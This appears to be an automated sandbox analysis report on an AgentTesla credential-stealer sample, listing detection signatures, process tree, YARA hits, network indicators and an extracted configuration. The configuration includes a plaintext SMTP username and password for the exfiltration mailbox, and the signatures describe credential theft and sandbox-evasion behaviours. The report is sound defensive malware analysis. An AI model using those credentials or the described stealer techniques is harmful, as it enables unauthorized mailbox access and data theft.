Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SlipMT103.exe

Overview

General Information

Sample Name:SlipMT103.exe
Analysis ID:528729
MD5:5cbac1b17cef2bc95f5b18f87ec1de49
SHA1:85d362c8463eaaf6c071414f741f32bd4cc51f0c
SHA256:29291b4fb097c75dc3ecf4787a03175ec150319e9ab97a96b6084d1fe2dae2a5
Tags:agentteslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SlipMT103.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\SlipMT103.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
    • SlipMT103.exe (PID: 6456 cmdline: C:\Users\user\Desktop\SlipMT103.exe MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • kprUEGC.exe (PID: 2900 cmdline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
    • kprUEGC.exe (PID: 988 cmdline: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • kprUEGC.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "administracion@aquanova.es", "Password": "Aquaribe2419*", "Host": "mail.aquanova.es"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SlipMT103.exe.3c27038.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.SlipMT103.exe.3c27038.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                10.2.kprUEGC.exe.44a0e18.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  10.2.kprUEGC.exe.44a0e18.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    12.0.kprUEGC.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 39 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.0.SlipMT103.exe.400000.12.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "administracion@aquanova.es", "Password": "Aquaribe2419*", "Host": "mail.aquanova.es"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SlipMT103.exeReversingLabs: Detection: 40%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeReversingLabs: Detection: 40%
                      Source: 1.0.SlipMT103.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.0.kprUEGC.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.0.kprUEGC.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.2.SlipMT103.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.SlipMT103.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.0.kprUEGC.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.SlipMT103.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.0.kprUEGC.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.SlipMT103.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.2.kprUEGC.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 12.0.kprUEGC.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.0.SlipMT103.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: SlipMT103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: SlipMT103.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49830 -> 51.83.52.225:587
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewIP Address: 51.83.52.225 51.83.52.225
                      Source: global trafficTCP traffic: 192.168.2.6:49830 -> 51.83.52.225:587
                      Source: global trafficTCP traffic: 192.168.2.6:49830 -> 51.83.52.225:587
                      Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: SlipMT103.exe, 00000001.00000002.628274243.0000000002AAE000.00000004.00000001.sdmpString found in binary or memory: http://3jx9Nc9mcrIeyBPlhe.org
                      Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: http://DrWvWz.com
                      Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://defaultcontainer/Views/MainWindow.xaml
                      Source: kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://foo/Views/MainWindow.xaml
                      Source: SlipMT103.exe, 00000001.00000002.628449891.0000000002AFF000.00000004.00000001.sdmpString found in binary or memory: http://mail.aquanova.es
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, SlipMT103.exe, 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.aquanova.es
                      Source: SlipMT103.exe, 00000000.00000002.359649304.0000000000D9B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 1.0.SlipMT103.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b63122FA5u002d5709u002d4B59u002dB007u002dC8CBD87FA871u007d/u00307651BC3u002d27A7u002d47FFu002dA50Au002d5D7213AA2347.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 1.2.SlipMT103.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b63122FA5u002d5709u002d4B59u002dB007u002dC8CBD87FA871u007d/u00307651BC3u002d27A7u002d47FFu002dA50Au002d5D7213AA2347.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 1.0.SlipMT103.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b63122FA5u002d5709u002d4B59u002dB007u002dC8CBD87FA871u007d/u00307651BC3u002d27A7u002d47FFu002dA50Au002d5D7213AA2347.csLarge array initialization: .cctor: array initializer size 11963
                      Source: 1.0.SlipMT103.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b63122FA5u002d5709u002d4B59u002dB007u002dC8CBD87FA871u007d/u00307651BC3u002d27A7u002d47FFu002dA50Au002d5D7213AA2347.csLarge array initialization: .cctor: array initializer size 11963
                      Source: SlipMT103.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_00685C24
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_00686DBD
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_01108250
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_0110D2F8
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_0528F538
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00456DBD
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_0093CC88
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00934130
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00939528
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_009316ED
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00934BD8
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_0093CC29
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_009345B8
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B8ED30
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B82618
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B8CE40
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B81FF0
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B8ED78
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B88FF8
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C285E0
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C21620
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C296B0
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C26AF8
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C27CF0
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00C21F90
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00CAA228
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00CA3764
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_027347A0
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_02733CCC
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_027346B0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_00EE5C24
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_00EE6DBD
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_01778250
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_0177D2F8
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_059BF538
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_059B5AB0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_059B5AA0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_00726DBD
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_04F047A0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_04F046B0
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_00976DBD
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_00975C24
                      Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.363621555.0000000005A00000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.359463739.0000000000700000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.364091388.0000000005F80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000001.00000000.355626536.00000000004D0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
                      Source: SlipMT103.exe, 00000001.00000002.621068774.00000000008F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SlipMT103.exe
                      Source: SlipMT103.exeBinary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
                      Source: SlipMT103.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: kprUEGC.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: SlipMT103.exeReversingLabs: Detection: 40%
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile read: C:\Users\user\Desktop\SlipMT103.exe:Zone.IdentifierJump to behavior
                      Source: SlipMT103.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\SlipMT103.exe "C:\Users\user\Desktop\SlipMT103.exe"
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess created: C:\Users\user\Desktop\SlipMT103.exe C:\Users\user\Desktop\SlipMT103.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
                      Source: C:\Users\user\Desktop\SlipMT103.exeProcess created: C:\Users\user\Desktop\SlipMT103.exe C:\Users\user\Desktop\SlipMT103.exe
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SlipMT103.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SlipMT103.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@7/5@1/1
                      Source: C:\Users\user\Desktop\SlipMT103.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\SlipMT103.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                      Source: SlipMT103.exeString found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
                      Source: SlipMT103.exeString found in binary or memory: views/addbook.baml
                      Source: SlipMT103.exeString found in binary or memory: views/addcustomer.baml
                      Source: SlipMT103.exeString found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
                      Source: SlipMT103.exeString found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
                      Source: SlipMT103.exeString found in binary or memory: views/addbook.baml
                      Source: SlipMT103.exeString found in binary or memory: views/addcustomer.baml
                      Source: SlipMT103.exeString found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
                      Source: kprUEGC.exeString found in binary or memory: views/addcustomer.baml
                      Source: kprUEGC.exeString found in binary or memory: views/addbook.baml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
                      Source: kprUEGC.exeString found in binary or memory: views/addbook.baml
                      Source: kprUEGC.exeString found in binary or memory: views/addcustomer.baml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
                      Source: kprUEGC.exeString found in binary or memory: views/addcustomer.baml
                      Source: kprUEGC.exeString found in binary or memory: views/addbook.baml
                      Source: kprUEGC.exeString found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
                      Source: SlipMT103.exeString found in binary or memory: Y/IArraySortHelp;component/views/addbook.xamlo/IArraySortHelp;component/views/borrowfrombookview.xamle/IArraySortHelp;component/views/borrowingview.xaml_/IArraySortHelp;component/views/changebook.xamlg/IArraySortHelp;component/views/changecustomer.xamlc/IArraySortHelp;component/views/customerview.xamlg/IArraySortHelp;component/views/deletecustomer.xaml]/IArraySortHelp;component/views/errorview.xamla/IArraySortHelp;component/views/smallextras.xamla/IArraySortHelp;component/views/addcustomer.xaml
                      Source: SlipMT103.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
                      Source: 1.0.SlipMT103.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.0.SlipMT103.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.SlipMT103.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.SlipMT103.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.0.SlipMT103.exe.400000.6.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.0.SlipMT103.exe.400000.6.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SlipMT103.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\SlipMT103.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: SlipMT103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SlipMT103.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: SlipMT103.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.SlipMT103.exe.680000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.SlipMT103.exe.680000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: kprUEGC.exe.1.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.13.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.SlipMT103.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_00689361 push ds; retf
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_006892F5 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 0_2_00689347 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00459347 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00459361 push ds; retf
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_004592F5 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00939EF8 push eax; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00933F65 push esp; iretd
                      Source: C:\Users\user\Desktop\SlipMT103.exeCode function: 1_2_00B87E3F push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_00EE9361 push ds; retf
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_00EE92F5 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_00EE9347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 10_2_059B56E0 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_007292F5 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_00729361 push ds; retf
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 12_2_00729347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_00979347 push ds; ret
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_009792F5 push ds; ret
